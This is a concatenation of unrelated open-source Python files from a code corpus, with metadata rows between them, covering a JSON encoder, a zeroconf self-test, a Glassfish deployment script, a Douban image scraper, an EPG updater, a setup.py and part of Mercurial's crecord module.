class FakeFloat(float):
"""
Float subclass designed to hold Decimal values
and keep its precision to the json module.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
s = str(self.value)
return s.rstrip('0').rstrip('.') if '.' in s else s
class JSONEncoder(json.JSONEncoder):
"""
JSONEncoder subclass that knows how to encode date/time/timedelta,
decimal types, generators and other basic python objects.
Taken from https://github.com/tomchristie/django-rest-framework/blob/master/rest_framework/utils/encoders.py
"""
def default(self, obj):
# For Date Time string spec, see ECMA 262
# http://ecma-international.org/ecma-262/5.1/#sec-15.9.1.15
if isinstance(obj, Promise):
return force_text(obj)
elif isinstance(obj, datetime.datetime):
representation = obj.isoformat()
if obj.microsecond:
representation = representation[:23] + representation[26:]
if representation.endswith('+00:00'):
representation = representation[:-6] + 'Z'
return representation
elif isinstance(obj, datetime.date):
return obj.isoformat()
elif isinstance(obj, datetime.time):
if timezone and timezone.is_aware(obj):
raise ValueError("JSON can't represent timezone-aware times.")
representation = obj.isoformat()
if obj.microsecond:
representation = representation[:12]
return representation
elif isinstance(obj, timedelta):
return six.text_type(timedelta.total_seconds(obj))
elif isinstance(obj, decimal.Decimal):
# Serializers will coerce decimals to strings by default.
return FakeFloat(obj)
elif isinstance(obj, uuid.UUID):
return six.text_type(obj)
elif isinstance(obj, QuerySet):
return tuple(obj)
elif hasattr(obj, 'tolist'):
# Numpy arrays and array scalars.
return obj.tolist()
elif hasattr(obj, '__getitem__'):
try:
return dict(obj)
except:
pass
elif hasattr(obj, '__iter__'):
return tuple(item for item in obj)
return super(JSONEncoder, self).default(obj)
| gpl-3.0 | -1,537,054,328,288,086,800 | 35.067568 | 112 | 0.61671 | false |
nameoftherose/python-zeroconf | examples/self_test.py | 8 | 1605 | #!/usr/bin/env python
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import socket
import sys
from zeroconf import __version__, ServiceInfo, Zeroconf
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
if len(sys.argv) > 1:
assert sys.argv[1:] == ['--debug']
logging.getLogger('zeroconf').setLevel(logging.DEBUG)
# Test a few module features, including service registration, service
# query (for Zoe), and service unregistration.
print("Multicast DNS Service Discovery for Python, version %s" % (__version__,))
r = Zeroconf()
print("1. Testing registration of a service...")
desc = {'version': '0.10', 'a': 'test value', 'b': 'another value'}
info = ServiceInfo("_http._tcp.local.",
"My Service Name._http._tcp.local.",
socket.inet_aton("127.0.0.1"), 1234, 0, 0, desc)
print(" Registering service...")
r.register_service(info)
print(" Registration done.")
print("2. Testing query of service information...")
print(" Getting ZOE service: %s" % (
r.get_service_info("_http._tcp.local.", "ZOE._http._tcp.local.")))
print(" Query done.")
print("3. Testing query of own service...")
info = r.get_service_info("_http._tcp.local.", "My Service Name._http._tcp.local.")
assert info
print(" Getting self: %s" % (info,))
print(" Query done.")
print("4. Testing unregister of service information...")
r.unregister_service(info)
print(" Unregister done.")
r.close()
| lgpl-2.1 | 6,033,828,405,536,089,000 | 39.125 | 87 | 0.619315 | false |
rcrowder/nupic | examples/opf/experiments/multistep/hotgym_best_sp_5step/description.py | 10 | 3246 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.exp_description_helpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'modelParams': { 'clParams': { 'verbosity': 0},
'inferenceType': 'NontemporalMultiStep',
'sensorParams': { 'encoders': { 'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'n': 28,
'name': u'consumption',
'type': 'AdaptiveScalarEncoder',
'w': 21},
'timestamp_dayOfWeek': { 'dayOfWeek': ( 21,
3),
'fieldname': u'timestamp',
'name': u'timestamp_dayOfWeek',
'type': 'DateEncoder'},
'timestamp_timeOfDay': { 'fieldname': u'timestamp',
'name': u'timestamp_timeOfDay',
'timeOfDay': ( 21,
1),
'type': 'DateEncoder'},
'timestamp_weekend': None},
'verbosity': 0},
'spParams': { },
'tmParams': { 'activationThreshold': 13,
'minThreshold': 9,
'verbosity': 0}}}
mod = importBaseDescription('../hotgym/description.py', config)
locals().update(mod.__dict__)
| agpl-3.0 | -1,626,276,287,187,717,600 | 58.018182 | 107 | 0.401725 | false |
kbase/trees | service/glassfish_administer_service.py | 3 | 12951 | #!/usr/bin/env python
'''
Created on Dec 6, 2013
@author: [email protected]
'''
from __future__ import print_function
from argparse import ArgumentParser
import subprocess
import os
import xml.etree.ElementTree as ET
import urllib2
from subprocess import CalledProcessError
import sys
_PARALLEL_GC = "-XX:-UseParallelGC"
_PARALLEL_GC_ESC = "-XX\:-UseParallelGC"
def _parseArgs():
parser = ArgumentParser(description='script to administer a Glassfish ' +
' application.')
parser.add_argument('-w', '--war',
help='path to the application WAR file. If ' +
'omitted, the service at the port and domain is ' +
'stopped.')
parser.add_argument('-a', '--admin', required=True,
help='location of the Glassfish asadmin program.')
parser.add_argument('-d', '--domain', required=True,
help='name of the Glassfish domain where the ' +
'application is or will be installed.')
parser.add_argument('-l', '--domain-dir',
help='directory where the glassfish domain ' +
'information and logs will be stored. Defaults to ' +
'glassfish/domains.')
parser.add_argument('-p', '--port', required=True, type=int,
help='the port where the application runs.')
parser.add_argument('-t', '--threads', type=int, default=20,
help='the number of threads for the application.')
parser.add_argument('-s', '--Xms', type=int,
help='minimum memory for the domain in MB. ' +
'This will cause a domain restart if changed.')
parser.add_argument('-x', '--Xmx', type=int,
help='maximum memory for the domain in MB. ' +
'This will cause a domain restart if changed.')
parser.add_argument('-r', '--properties', nargs='*',
help='JVM system properties to add to the server.')
parser.add_argument('--set', nargs='*',
help='Set glassfish configuration attribute (ie asadmin set ...).')
parser.add_argument('-g', '--noparallelgc', action='store_true',
help='permanently turn off the parallel garbage ' +
' collector and use the standard gc.')
return parser.parse_args()
class CommandGlassfishDomain(object):
def __init__(self, asadminpath, domain, domainpath):
self.asadminpath = asadminpath
self.domain = domain
self.path = None
if (domainpath):
domaindir = os.path.abspath(os.path.expanduser(domainpath))
if not os.path.isdir(domaindir):
if not os.path.exists(domaindir):
os.mkdir(domaindir)
else:
print('Domain path ' + domainpath + ' must be a directory')
sys.exit(1)
self.path = domaindir
p = (' at ' + self.path) if(self.path) else ''
if self.exists():
print('Domain ' + self.domain + ' exists' + p +
', skipping creation')
else:
print('Creating domain ' + self.domain + p)
print(self._run_local_command('create-domain', '--nopassword=true',
self.domain).rstrip())
self.adminport = self.get_admin_port()
self.start_domain()
def get_admin_port(self):
#the fact I have to do this is moronic
if (self.path):
domains = self.path
else:
bindir = os.path.dirname(self.asadminpath)
glassfish = os.path.join(bindir, "..")
domains = os.path.join(glassfish, "domains")
domain = os.path.join(domains, self.domain)
configfile = os.path.join(domain, "config/domain.xml")
xml = ET.parse(configfile)
root = xml.getroot()
config = root.findall("./configs/config[@name='server-config']")[0]
adminlist = config.findall(
"./network-config/network-listeners/network-listener[@protocol=" +
"'admin-listener']")[0]
return adminlist.attrib['port']
def start_domain(self):
if self.is_running():
print ("Domain " + self.domain + " is already running on port " +
self.adminport)
else:
print("Starting domain " + self.domain)
print(self._run_local_command('start-domain', self.domain)
.rstrip())
self.adminport = self.get_admin_port()
def restart_domain(self):
if self.is_running():
print("Restarting " + self.domain + ", please wait")
print(self._run_local_command('restart-domain', self.domain)
.rstrip())
else:
self.start_domain()
def exists(self):
return self.domain in self._list_domains()
def is_running(self):
return self.domain + " running" in self._list_domains()
def start_service(self, war, port, threads):
portstr = str(port)
threadstr = str(threads)
if 'server-' + portstr in self._run_remote_command(
'list-virtual-servers'):
print("Virtual server already exists")
else:
print(self._run_remote_command(
'create-virtual-server', '--hosts',
'${com.sun.aas.hostName}', 'server-' + portstr).rstrip())
if 'thread-pool-' + portstr in self._run_remote_command(
'list-threadpools', 'server'):
print("Threadpool already exists")
else:
print(self._run_remote_command(
'create-threadpool', '--maxthreadpoolsize=' + threadstr,
'--minthreadpoolsize=' + threadstr, 'thread-pool-' + portstr)
.rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-http-listeners'):
print('Http listener already exists')
else:
print(self._run_remote_command(
'create-http-listener', '--listeneraddress', '0.0.0.0',
'--listenerport', portstr,
'--default-virtual-server', 'server-' + portstr,
'--securityEnabled=false', '--acceptorthreads=' + threadstr,
'http-listener-' + portstr).rstrip())
print(self._run_remote_command(
'set', 'server.network-config.network-listeners.' +
'network-listener.http-listener-' + portstr +
'.thread-pool=thread-pool-' + portstr).rstrip())
print(self._run_remote_command(
'set', 'server.network-config.protocols.protocol.' +
'http-listener-' + portstr + '.http.timeout-seconds=1800')
.rstrip())
if 'app-' + portstr in self._run_remote_command('list-applications'):
print(self._run_remote_command('undeploy', 'app-' + portstr)
.rstrip())
print(self._run_remote_command(
'deploy', '--virtualservers', 'server-' + portstr,
'--contextroot', '/', '--name', 'app-' + portstr, war).rstrip())
try:
urllib2.urlopen('http://localhost:' + portstr)
except urllib2.HTTPError as h:
resp = h.read()
else:
print('Unexpected response from server - the server did not ' +
'start up successfully. Please check the glassfish logs.')
return False
if '32603' in resp:
print('The server failed to start up successfully and is ' +
'running in protected mode. Please check the system and ' +
'glassfish logs.')
return False
elif '32300' in resp:
print('The server started successfully.')
return True
else:
print('The server failed to start up successfully and is not '
+ 'running. Please check the system and glassfish logs.')
return False
def stop_service(self, port):
portstr = str(port)
if 'app-' + portstr in self._run_remote_command('list-applications'):
print(self._run_remote_command('undeploy', 'app-' + portstr)
.rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-http-listeners'):
print(self._run_remote_command(
'delete-http-listener', 'http-listener-' + portstr).rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-protocols'):
print(self._run_remote_command(
'delete-protocol', 'http-listener-' + portstr).rstrip())
if 'thread-pool-' + portstr in self._run_remote_command(
'list-threadpools', 'server'):
print(self._run_remote_command(
'delete-threadpool', 'thread-pool-' + portstr).rstrip())
if 'server-' + portstr in self._run_remote_command(
'list-virtual-servers'):
print(self._run_remote_command(
'delete-virtual-server', 'server-' + portstr).rstrip())
def set_min_max_memory(self, minm, maxm):
# will restart the domain if changes are necessary
xmx = []
xms = []
for o in self._run_remote_command('list-jvm-options').split('\n'):
if o.startswith('-Xmx'):
xmx.append(o)
if o.startswith('-Xms'):
xms.append(o)
if (len(xms) > 1 and minm is None):
print('WARNING: multiple Xms parameters set on service: ' +
str(xms))
if (len(xmx) > 1 and maxm is None):
print('WARNING: multiple Xmx parameters set on service: ' +
str(xmx))
changed = self._set_memory(None if minm is None else '-Xms' +
str(minm) + 'm', xms)
changed2 = self._set_memory(None if maxm is None else '-Xmx'
+ str(maxm) + 'm', xmx)
if changed or changed2:
self.restart_domain()
def stop_parallel_gc(self):
for o in self._run_remote_command('list-jvm-options').split('\n'):
if o == _PARALLEL_GC:
return
self.create_jvm_option(_PARALLEL_GC_ESC)
self.restart_domain()
def create_property(self, prop):
print('Creating property ' + prop)
print(self._run_remote_command('create-system-properties', prop)
.rstrip())
def create_jvm_option(self, prop):
print('Creating jvm property ' + prop)
print(self._run_remote_command('create-jvm-options', prop)
.rstrip())
def set_glassfish_config_option(self, prop):
print('Setting glassfish configuration option ' + prop)
print(self._run_remote_command('set', prop)
.rstrip())
def _set_memory(self, memstr, memlist):
if (memstr is not None and [memstr] != memlist):
print("Removing options " + str(memlist))
for o in memlist:
self._remove_option(o)
print("Setting option " + memstr)
self._set_option(memstr)
return True
else:
return False
def _set_option(self, opt):
self._run_remote_command('create-jvm-options', opt)
def _remove_option(self, opt):
self._run_remote_command('delete-jvm-options', opt)
def _list_domains(self):
return self._run_local_command('list-domains')
def _run_local_command(self, subcmd, *args):
cmd = [self.asadminpath, subcmd]
if (self.path):
cmd.extend(['--domaindir', self.path])
try:
return subprocess.check_output(cmd + list(args))
except CalledProcessError as cpe:
print(cpe.output.rstrip())
sys.exit(1)
def _run_remote_command(self, *cmd):
try:
return subprocess.check_output([self.asadminpath, '-p',
self.adminport] + list(cmd))
except CalledProcessError as cpe:
print(cpe.output.rstrip())
sys.exit(1)
if __name__ == '__main__':
args = _parseArgs()
gf = CommandGlassfishDomain(args.admin, args.domain, args.domain_dir)
if (args.war == None):
gf.stop_service(args.port)
else:
if (args.noparallelgc):
gf.stop_parallel_gc()
gf.set_min_max_memory(args.Xms, args.Xmx)
for p in args.properties:
gf.create_property(p)
if args.set is not None:
for s in args.set:
gf.set_glassfish_config_option(s)
success = gf.start_service(args.war, args.port, args.threads)
if not success:
sys.exit(1)
| mit | -5,904,721,624,878,219,000 | 41.048701 | 92 | 0.54436 | false |
yangdw/repo.python | src/project/web-crawler/douban_WebCrawler.py | 2 | 2988 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import re
import time
import random
import urllib,urllib2
def download_picture( pictrue_url , title ):
''' '''
path = r'E:\douban'+os.sep+title+os.sep
if not os.path.exists(path):
os.makedirs(path)
file_path = path+pictrue_url.split('/')[-1]
if os.path.isfile(file_path):
return
time.sleep(3+random.random()*2)
data = urllib.urlretrieve(pictrue_url,file_path)
def deal_path(path):
'''
can not have special characters:/\:*?<>|"
'''
if path.count('/'):
path = path.replace('/','_')
if path.count('\\'):
path = path.replace(r'\\','_')
if path.count(r':'):
path = path.replace(r':','_')
if path.count(r'*'):
path = path.replace(r'*','_')
if path.count(r'?'):
path = path.replace(r'?','_')
if path.count(r'<'):
path = path.replace(r'<','_')
if path.count(r'>'):
path = path.replace(r'>','_')
if path.count(r'|'):
path = path.replace(r'|','_')
return path
def work( url ):
'''download first url
find picture url and progress
download picture
if progress not finish:
work( picture url )'''
## req_header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
## 'Accept':'text/html;q=0.9,*/*;q=0.8',
## 'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
## 'Accept-Encoding':'gzip',
## 'Connection':'close',
## 'Referer':None #注意如果依然不能抓取的话,这里可以设置抓取网站的host
## }
## req_timeout=5
## req=urllib2.Request(url,None,req_header)
## resp=urllib2.urlopen(url,None,req_timeout)
resp = urllib2.urlopen( url )
data = resp.read()
#print data
title = re.findall("<title>\n*?.*?\n*?</title>", data)[0].split('\n')[1].decode('utf-8').strip()
print title
title = deal_path(title)
print title
progress = re.findall('<span class="ll">第\d*?张 / 共\d*?张</span>',data)[0].decode('utf-8')
progress = re.findall('\d*?张'.decode('utf-8'),progress)
print progress,'Be finished?',progress[0]==progress[1]
picture_url = re.findall('<div style="text-align:center">.*?</div>',data,re.S)[0]
picture_url = re.findall('<img .*? />',picture_url)[0].split('"')[1]
print picture_url
download_picture( picture_url , title )
next_url = re.findall('<link rel="next".*?/>',data)[0].split('"')[3]
print next_url
if progress[0]!=progress[1]:
work( next_url )
if __name__ == '__main__':
'''
get first url from .txt file
for each url get pictures
'''
print 'start'
douban_urls = open(r'E:\douban\urls.txt','r')
first_url = douban_urls.readline()
while first_url:
work(first_url.strip())
first_url = douban_urls.readline()
print 'end'
| mit | 547,430,320,940,881,860 | 29.842105 | 135 | 0.55529 | false |
caasiu/xbmc-addons-chinese | plugin.video.cntv-live/epgservice.py | 8 | 6351 | # -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import datetime
import re
import shutil
import traceback
import urllib2
addon = xbmcaddon.Addon(id="plugin.video.cntv-live")
addon_path = xbmc.translatePath(addon.getAddonInfo("path"))
def updateChannel(fHandle, channelID, channelName):
try:
print("Updating channel " + channelID)
dateInChina = (datetime.datetime.utcnow() + datetime.timedelta(hours=8)).replace(hour=0, minute=0) #UTC +0800
localTZ = datetime.datetime.now() - datetime.datetime.utcnow() #UTC + how much?
tzOffset = localTZ - datetime.timedelta(hours=8) #how much ahead of China
#Get data
request = urllib2.Request("http://tv.cntv.cn/index.php?action=epg-list&date=" + dateInChina.strftime("%Y-%m-%d") + "&channel=" + channelID)
request.add_header("Referer", "http://tv.cntv.cn/epg")
resp = urllib2.urlopen(request)
data = resp.read().decode("utf-8")
match = re.compile('<dd(?: class="cur1")?>(.+?)</dd>', re.DOTALL).findall(data)
#Process data
programmes = []
for entry in match:
linkValue = re.compile('>(.+?)<', re.DOTALL).search(entry).group(1) #Wow... There's actually a syntax error in the page.
timeString = linkValue[:linkValue.index(" ")]
entryTime = dateInChina.replace(hour=int(timeString[:timeString.index(":")]), minute=int(timeString[timeString.index(":") + 1:]))
entryName = linkValue[linkValue.index(" ") + 1:]
programmes.append((entryTime, entryName))
#Write channel data
fHandle.write('<channel id="{0}">\n'.format(channelID))
fHandle.write('<display-name lang="cn">{0}</display-name>\n'.format(channelName))
fHandle.write('</channel>\n'.format(channelID))
#Write programme data
for i in range(len(programmes)):
entry = programmes[i]
startTime = entry[0]
if i < len(programmes) - 1: #EAFP is too hard.
stopTime = programmes[i + 1][0]
else:
stopTime = dateInChina + datetime.timedelta(days=1)
#Convert to local time zone
startTime = startTime + tzOffset
stopTime = stopTime + tzOffset
fHandle.write('<programme start="{0}" stop="{1}" channel="{2}">\n'.format(formatDate(startTime), formatDate(stopTime), channelID))
fHandle.write('<title lang="cn">{0}</title>\n'.format(entry[1].encode("utf-8")))
fHandle.write('</programme>\n')
except Exception:
print(traceback.format_exc())
def formatDate(obj):
return obj.strftime("%Y%m%d%H%M00")
def doUpdate():
print("Updating EPG")
try:
fHandle = open(xbmc.translatePath("special://temp/epg2.xml"), "w")
fHandle.write('<?xml version="1.0" encoding="utf-8" ?>\n')
fHandle.write('<tv>\n')
if addon.getSetting("epgYangshi") == "true":
updateChannel(fHandle, "cctv1", "CCTV-1 综合")
updateChannel(fHandle, "cctv2", "CCTV-2 财经")
updateChannel(fHandle, "cctv3", "CCTV-3 综艺")
updateChannel(fHandle, "cctv4", "CCTV-4 (亚洲)")
updateChannel(fHandle, "cctveurope", "CCTV-4 (欧洲)")
updateChannel(fHandle, "cctvamerica", "CCTV-4 (美洲)")
updateChannel(fHandle, "cctv5", "CCTV-5 体育")
updateChannel(fHandle, "cctv6", "CCTV-6 电影")
updateChannel(fHandle, "cctv7", "CCTV-7 军事 农业")
updateChannel(fHandle, "cctv8", "CCTV-8 电视剧")
updateChannel(fHandle, "cctvjilu", "CCTV-9 纪录")
updateChannel(fHandle, "cctvdoc", "CCTV-9 纪录(英)")
updateChannel(fHandle, "cctv10", "CCTV-10 科教")
updateChannel(fHandle, "cctv11", "CCTV-11 戏曲")
updateChannel(fHandle, "cctv12", "CCTV-12 社会与法")
updateChannel(fHandle, "cctv13", "CCTV-13 新闻")
updateChannel(fHandle, "cctvchild", "CCTV-14 少儿")
updateChannel(fHandle, "cctv15", "CCTV-15 音乐")
updateChannel(fHandle, "cctv9", "CCTV-NEWS")
updateChannel(fHandle, "cctv5plus", "CCTV体育赛事")
if addon.getSetting("epgWeishi") == "true":
updateChannel(fHandle, "anhui", "安徽卫视")
updateChannel(fHandle, "btv1", "北京卫视")
updateChannel(fHandle, "bingtuan", "兵团卫视")
updateChannel(fHandle, "chongqing", "重庆卫视")
updateChannel(fHandle, "dongfang", "东方卫视")
updateChannel(fHandle, "dongnan", "东南卫视")
updateChannel(fHandle, "gansu", "甘肃卫视")
updateChannel(fHandle, "guangdong", "广东卫视")
updateChannel(fHandle, "guangxi", "广西卫视")
updateChannel(fHandle, "guizhou", "贵州卫视")
updateChannel(fHandle, "hebei", "河北卫视")
updateChannel(fHandle, "henan", "河南卫视")
updateChannel(fHandle, "heilongjiang", "黑龙江卫视")
updateChannel(fHandle, "hubei", "湖北卫视")
updateChannel(fHandle, "jilin", "吉林卫视")
updateChannel(fHandle, "jiangxi", "江西卫视")
updateChannel(fHandle, "kangba", "康巴卫视")
updateChannel(fHandle, "liaoning", "辽宁卫视")
updateChannel(fHandle, "travel", "旅游卫视")
updateChannel(fHandle, "neimenggu", "内蒙古卫视")
updateChannel(fHandle, "ningxia", "宁夏卫视")
updateChannel(fHandle, "qinghai", "青海卫视")
updateChannel(fHandle, "shandong", "山东卫视")
updateChannel(fHandle, "sdetv", "山东教育台")
updateChannel(fHandle, "shenzhen", "深圳卫视")
updateChannel(fHandle, "shan1xi", "山西卫视")
updateChannel(fHandle, "shan3xi", "陕西卫视")
updateChannel(fHandle, "shenzhen", "深圳卫视")
updateChannel(fHandle, "sichuan", "四川卫视")
updateChannel(fHandle, "tianjin", "天津卫视")
updateChannel(fHandle, "xizang", "西藏卫视")
updateChannel(fHandle, "xiamen", "厦门卫视")
updateChannel(fHandle, "xianggangweishi", "香港卫视")
updateChannel(fHandle, "xinjiang", "新疆卫视")
updateChannel(fHandle, "yanbian", "延边卫视")
updateChannel(fHandle, "yunnan", "云南卫视")
updateChannel(fHandle, "zhejiang", "浙江卫视")
fHandle.write('</tv>\n')
fHandle.close()
shutil.copyfile(xbmc.translatePath("special://temp/epg2.xml"), xbmc.translatePath("special://temp/epg.xml")) #Good programming practices, yo!
except Exception:
print(traceback.format_exc())
print("Finished updating EPG")
#Set a timer for the next update
startTimer(30)
def startTimer(delay): #minutes
xbmc.executebuiltin("AlarmClock({0},RunScript({1}),{2},True)".format("EPGUpdate", addon_path + "/epgservice.py", delay))
if __name__ == '__main__':
if addon.getSetting("epg") == "true":
doUpdate()
| gpl-2.0 | -3,637,042,978,797,846,500 | 37.432258 | 143 | 0.679872 | false |
recipy/recipy | setup.py | 1 | 3177 | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='recipy',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.3.0',
description='A frictionless provenance framework for Python',
long_description="""A frictionless provenance framework for Python.
Please see https://github.com/recipy/recipy for further information.
""",
# The project's main homepage.
url='https://github.com/recipy/recipy',
# Author details
author='Robin Wilson, Raquel Alegre, Janneke van der Zwaan',
author_email='[email protected]',
# Choose your license
license='Apache',
include_package_data=True,
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='development, science, reproducibility, provenance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#
# Flask needs to be last here, or it screws up the installation in certain
# situations
install_requires=['wrapt', 'tinydb>=3.0.0', 'tinydb-serialization',
'jinja2', 'docopt', 'GitPython', 'colorama',
'Flask-Script', 'flask_bootstrap', 'flask-wtf',
'python-dateutil', 'six', "svn", "binaryornot",
'flask',
# dependencies for `python setup.py build_sphinx`
'sphinx',
'recommonmark',
'sphinx_rtd_theme'],
entry_points={
'console_scripts': [
'recipy=recipyCmd.recipycmd:main',
]
}
)
| apache-2.0 | -1,122,147,261,581,804,700 | 34.696629 | 79 | 0.626062 | false |
sunspec/pysunspec | setup.py | 1 | 1300 | #!/usr/bin/env python
"""
Copyright (c) 2018, SunSpec Alliance
All Rights Reserved
"""
from distutils.core import setup
setup(name = 'pysunspec',
version = '2.1.1',
description = 'Python SunSpec Tools',
author = 'Bob Fox',
author_email = '[email protected]',
classifiers = [
'Operating System :: OS Independent',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
packages = ['sunspec', 'sunspec.core', 'sunspec.core.modbus', 'sunspec.core.test', 'sunspec.core.test.fake'],
package_data = {'sunspec': ['models/smdx/*'], 'sunspec.core.test': ['devices/*']},
scripts = ['scripts/suns.py'],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
install_requires = ['pyserial'],
)
| mit | -7,677,205,293,987,355,000 | 37.235294 | 115 | 0.546923 | false |
adaptive-learning/proso-apps | proso/django/request.py | 1 | 3326 | from threading import currentThread
import datetime
import json as simplejson
import re
import urllib.parse
def load_query_json(query_dict, key, default_json=None):
value = query_dict.get(key, default_json)
try:
return simplejson.loads(value)
except ValueError:
return simplejson.loads(urllib.parse.unquote(value))
def json_body(body):
try:
return simplejson.loads(body)
except ValueError:
return parse_common_body_to_json(body)
def parse_common_body_to_json(body):
body = body.replace('%5B', '[').replace('%5D', ']')
result = {}
pairs = [x[0] for x in re.findall(r'(.*?[^\\])(\&|$)', body)]
for pair in pairs:
key, value = pair.split('=')
result = _store_body_value(key, value, result)
return result
def _store_body_value(key_string, value, result):
if value.isdigit():
value = int(value)
keys = [x.strip(']') for x in re.split('\[', key_string)]
old = result
for i in range(len(keys)):
k = keys[i]
if k.isdigit():
k = int(k)
if isinstance(old, dict):
new = old.get(k)
elif k <= len(old) - 1:
new = old[k]
else:
new = None
if new is None:
if i == len(keys) - 1:
new = value
else:
if keys[i + 1] == '0':
new = []
else:
new = {}
if isinstance(k, int):
old.append(new)
else:
old[k] = new
else:
if i == len(keys) - 1:
if not isinstance(new, list):
new = [new]
old[k] = new
new.append(value)
old = new
return result
def is_user_id_overridden(request):
return 'user' in request.GET and request.user.is_staff
def get_user_id(request=None):
if request is None:
request = get_current_request(force=False)
if request is None:
return None
if is_user_id_overridden(request):
return int(request.GET['user'])
else:
return None if request.user is None else request.user.id
def is_time_overridden(request):
return 'time' in request.GET
def get_time(request):
if 'time' in request.GET:
time = datetime.datetime.strptime(request.GET['time'], '%Y-%m-%d_%H:%M:%S')
return time
else:
return datetime.datetime.now()
def get_language(request):
language = request.GET.get("language", None)
return language if language else request.LANGUAGE_CODE
###############################################################################
# currect request
###############################################################################
_request_initialized = False
_current_request = {}
class RequestMiddleware:
def process_request(self, request):
set_current_request(request)
def set_current_request(request):
global _request_initialized
_request_initialized = True
_current_request[currentThread()] = request
def get_current_request(force=True):
if not force and not _request_initialized:
return None
assert _request_initialized, 'RequestMiddleware is not loaded'
return _current_request[currentThread()]
| mit | -7,258,798,370,872,251,000 | 25.608 | 83 | 0.546001 | false |
facebookexperimental/eden | eden/scm/edenscm/mercurial/crecord.py | 1 | 67542 | # Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# stuff related specifically to patch manipulation / parsing
#
# Copyright 2008 Mark Edgington <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
#
# This code is based on the Mark Edgington's crecord extension.
# (Itself based on Bryan O'Sullivan's record extension.)
from __future__ import absolute_import
import locale
import os
import re
import signal
from . import encoding, error, patch as patchmod, progress, pycompat, scmutil, util
from .i18n import _
stringio = util.stringio
# This is required for ncurses to display non-ASCII characters in default user
# locale encoding correctly. --immerrr
locale.setlocale(locale.LC_ALL, u"")
# patch comments based on the git one
diffhelptext = _(
"""# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed from the patch.
"""
)
hunkhelptext = _(
"""#
# If the patch applies cleanly, the edited hunk will immediately be
# added to the record list. If it does not apply cleanly, a rejects file
# will be generated. You can use that when you try again. If all lines
# of the hunk are removed, then the edit is aborted and the hunk is left
# unchanged.
"""
)
patchhelptext = _(
"""#
# If the patch applies cleanly, the edited patch will immediately
# be finalised. If it does not apply cleanly, rejects files will be
# generated. You can use those when you try again.
"""
)
try:
import curses
curses.error
except ImportError:
# I have no idea if wcurses works with crecord...
try:
# pyre-fixme[21]: Could not find `wcurses`.
import wcurses as curses
curses.error
except ImportError:
# wcurses is not shipped on Windows by default, or python is not
# compiled with curses
curses = False
def checkcurses(ui):
"""Return True if the user wants to use curses
This method returns True if curses is found (and that python is built with
it) and that the user has the correct flag for the ui.
"""
return curses and ui.interface("chunkselector") == "curses"
class patchnode(object):
"""abstract class for patch graph nodes
(i.e. patchroot, header, hunk, hunkline)
"""
def firstchild(self):
raise NotImplementedError("method must be implemented by subclass")
def lastchild(self):
raise NotImplementedError("method must be implemented by subclass")
def allchildren(self):
"Return a list of all of the direct children of this node"
raise NotImplementedError("method must be implemented by subclass")
def nextsibling(self):
"""
Return the closest next item of the same type where there are no items
of different types between the current item and this closest item.
If no such item exists, return None.
"""
raise NotImplementedError("method must be implemented by subclass")
def prevsibling(self):
"""
Return the closest previous item of the same type where there are no
items of different types between the current item and this closest item.
If no such item exists, return None.
"""
raise NotImplementedError("method must be implemented by subclass")
def parentitem(self):
